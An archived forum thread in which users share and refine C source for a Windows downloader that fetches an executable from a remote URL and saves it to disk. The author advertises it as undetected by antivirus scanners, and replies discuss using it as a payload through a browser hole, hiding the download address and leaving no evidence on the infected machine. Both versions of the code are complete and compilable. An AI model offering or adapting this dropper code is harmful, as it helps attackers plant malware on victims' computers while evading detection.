Articles
|
|
apsync
Aug 8 2005, 11:20 AM
here is an File Downloader, tested & compiled with lcc scanned & undetected by all av's at virusscan.jotti.org CODE #include <stdio.h>
#include <windows.h>
#include <wininet.h>
int main()
{
FILE *fp;
HINTERNET hOpen, hURL;
char file[99];
unsigned long read;
hOpen = InternetOpen("WebReader", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0 );
hURL = InternetOpenUrl( hOpen, "http://kisobox.com/files/putty.exe", NULL, 0, 0, 0 );
fp = fopen("c:\\putty.exe", "wb");
while(InternetReadFile(hURL, file, sizeof(file) - 1 , &read) && read != 0)
{
fwrite(file, sizeof(char), read, fp);
file[read] = '\0';
}
fclose(fp);
return 0;
} MSVC++ users dont forget to add #pragma comment (lib, "wininet.lib") and lcc users should compile with -lib wininet.lib
fandango
Aug 8 2005, 01:07 PM
why not making the program way more useful by letting the user decide the url to download from and of course path and filename of the file to store ? like this its .. hmm  greetz
apsync
Aug 8 2005, 01:21 PM
you put the file you want to download here -> CODE InternetOpenUrl( hOpen, "http://kisobox.com/files/putty.exe", NULL, 0, 0, 0 ); and this is where you want to download to CODE fp = fopen("c:\\putty.exe", "wb");
tibbar
Aug 8 2005, 02:06 PM
no flaming guys. let's keep posting informative.
if you start your main function as:
int main( int argc, char* argv[] )
you can then make this "dynamic", by picking up argv[1], argv[2], which could contain webaddress, filename respectively.
Matt
Aug 8 2005, 02:08 PM
QUOTE(fandango @ Aug 8 2005, 08:27 AM) hm programs should be 'dynamic' - whether its a simple app like this or a more 'advanced' one ... hardcoded this app is not very useful whatever my 2c .. greetz I actually think this program is more useful because it does not require any user direct input. So it could be setup to run without leaking any info, like what is being downloaded.. Contrary to an exe with switches.. example : downloader.exe / file=hxxp://www.whatever.com/file.exe I'd rather have fully hidden parameters !
tibbar
Aug 8 2005, 02:23 PM
QUOTE(Matt @ Aug 8 2005, 02:08 PM) QUOTE(fandango @ Aug 8 2005, 08:27 AM) hm programs should be 'dynamic' - whether its a simple app like this or a more 'advanced' one ... hardcoded this app is not very useful whatever my 2c .. greetz I actually think this program is more useful because it does not require any user direct input. So it could be setup to run without leaking any info, like what is being downloaded.. Contrary to an exe with switches.. example : downloader.exe / file=hxxp://www.whatever.com/file.exe I'd rather have fully hidden parameters ! i disagree. for instance if this exe was a payload in say an iexplorer hole, then would a skiddie want the actual webaddress embedded in the downloader? probably not, as it would leave evidence on the infected pc. instead they would opt to use a generic downloader and pass it the required parameters. in any case, we are not here to argue about tiny details. it's nice to see people posting their code, so keep criticisms constructive and don't get upset if someone suggests an improvement.
apsync
Aug 8 2005, 03:13 PM
anyway, parameter supported version usage this.exe www.google.com/file.exe c:\saved.exe CODE #include <stdio.h>
#include <windows.h>
#include <wininet.h>
#pragma comment (lib, "wininet.lib")
int main(int argc, char* argv[])
{
FILE *fp;
HINTERNET hOpen, hURL;
char file[99];
unsigned long read;
if(argc != 3)
{
printf("usage file.exe <url> <save to>\n");
return 1;
}
hOpen = InternetOpen("WebReader", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0 );
hURL = InternetOpenUrl( hOpen, argv[1], NULL, 0, 0, 0 );
fp = fopen(argv[2], "wb");
while(InternetReadFile(hURL, file, sizeof(file) - 1 , &read) && read != 0)
{
fwrite(file, sizeof(char), read, fp);
file[read] = '\0';
}
fclose(fp);
return 0;
}
Good work, I'd modify two versions, one that you could use to embed the addresses in and use it as a payload and another one that you could use dynamically, by specifying the local and remote file addresses.
chris105
Aug 12 2005, 12:32 AM
Sorry I have been away so havnt been able to act, someone reported this thread to me and I would just like to ask everyone to keep the comments constructive and also say that as long as criticism is constructive then the author must face up to the fact changes need to be made.
nolimit
Aug 12 2005, 12:33 AM
Doesn't really matter here that much but there is a single function that does this entire thing, in urlmon.dll
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
|
